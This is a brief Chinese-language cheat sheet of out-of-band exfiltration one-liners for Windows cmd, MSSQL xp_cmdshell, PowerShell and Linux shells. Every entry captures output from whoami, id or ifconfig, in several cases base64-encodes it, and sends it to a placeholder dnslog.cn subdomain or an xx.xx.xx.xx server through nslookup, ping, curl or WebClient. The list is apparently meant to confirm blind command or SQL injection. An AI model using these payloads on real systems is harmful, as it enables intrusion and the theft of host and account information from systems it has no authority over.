各种环境DNS外带回显命令

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"

exec master..xp_cmdshell  "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";

exec master..xp_cmdshell  "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";

exec master..xp_cmdshell  "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";

for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%X

for /F "delims= tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn

for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);

ping -c 1 $(whoami).xxx.dnslog.cn

ping -c 1 $(whoami|base64).xxx.dnslog.cn

curl http://xx.xx.xx.xx/$(whoami)

curl http://$(whoami).xx.dnslog.cn

curl http://xx.xx.xx.xx/$(id|base64)

curl http://$(id|base64).xx.dnslog.cn

curl http://xx.xx.xx.xx/$(ifconfig|base64|tr 'n' '-')